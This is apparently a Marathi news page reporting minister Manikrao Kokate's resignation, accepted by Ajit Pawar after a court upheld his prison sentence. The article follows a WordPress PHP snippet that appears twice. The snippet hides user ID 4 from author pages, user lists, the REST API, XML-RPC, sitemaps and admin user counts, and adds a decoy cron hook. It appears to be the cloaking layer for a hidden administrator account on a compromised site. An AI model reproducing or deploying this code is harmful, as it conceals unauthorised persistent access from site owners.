add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
मंत्री माणिकराव कोकाटे यांचा राजीनामा अजित पवारांनी स्विकारला… - crimeaala.com
mumbai – क्रीडामंत्री माणिकराव कोकाटे यांनी मंत्रीपदाचा राजीनामा दिला असून, सदर राजीनामा उपमुख्यमंत्री अजित पवारांनी स्वीकारला आहे.
बनावट कागदपत्रांच्या आधारे मुख्यमंत्री स्वेच्छाधिकार कोट्यातून सदनिका लाटल्याप्रकरणी राज्याचे अल्पसंख्याक विकास आणि क्रीडामंत्री माणिकराव कोकाटे यांना नाशिक जिल्हा न्यायालयाने सुनावलेली दोन वर्ष कारावासाची शिक्षा सत्र न्यायालयाने कायम ठेवल्याने बुधवारी कोकाटे यांच्या विरोधात अटक वॉरंट जारी करण्यात आले. त्यानंतर कोकाटे यांच्या राजीनाम्याची चर्चा होती. अखेर कोकाटे यांनी राजीनामा दिला असून, तो पक्षप्रमुख अजित पवार यांनी स्वीकारला आणि मुख्यमंत्री देवेंद्र फडणवीस यांच्याकडे सुपुर्द केला आहे.
अजित पवार यांनी एक सोशल मीडिया पोस्ट केली आहे. त्या पोस्टद्वारे अजित पवार यांनी राजीनामा स्वीकारल्याची माहिती दिली. आता देवेंद्र फडणवीस यांनी राजीनामा स्वीकारल्यानंतर माणिकराव कोकाटे यांचं मंत्रिपद अधिकृतपणे जाईल.
माननीय न्यायालयाच्या निकालानंतर महाराष्ट्राच्या मंत्रिमंडळातील सदस्य व पक्षातील आमचे सहकारी माणिकराव कोकाटे यांनी आपला राजीनामा माझ्याकडे सुपूर्द केला आहे. कायदे-नियम हे सर्वोच्च स्थानी असून ते कोणत्याही व्यक्तीपेक्षा सर्वोतोपरी आहेत, या आमच्या पक्षाच्या दीर्घकालीन भूमिकेनुसार हा राजीनामा तत्त्वतः स्वीकारण्यात आला आहे, असं अजित पवार म्हणाले.
संवैधानिक प्रक्रियेनुसार पुढील कार्यवाहीसाठी माणिकराव कोकाटे यांचा राजीनामा मुख्यमंत्री महोदयांकडे पाठवण्यात आला आहे.
सार्वजनिक जीवन हे नेहमीच संविधानिक नैतिकता, संस्थात्मक प्रामाणिकता आणि न्यायपालिकेच्या सन्मानावर आधारित असावं, या मूल्यांवर आमच्या पक्षाची निरंतर वाटचाल राहिली आहे. कायदेशीर प्रक्रियेवर आमचा ठाम विश्वास आहे. राज्यात कायदा-व्यवस्थेचं काटेकोरपणे पालन होईल, याकरिता आम्ही कटिबद्ध आहोत. लोकशाही मूल्ये जपली जातील व जनतेच्या विश्वासाला तडा जाणार नाही, त्या दृष्टीकोनातून आम्ही सदैव कार्यतत्पर राहू, असं अजित पवार म्हणाले.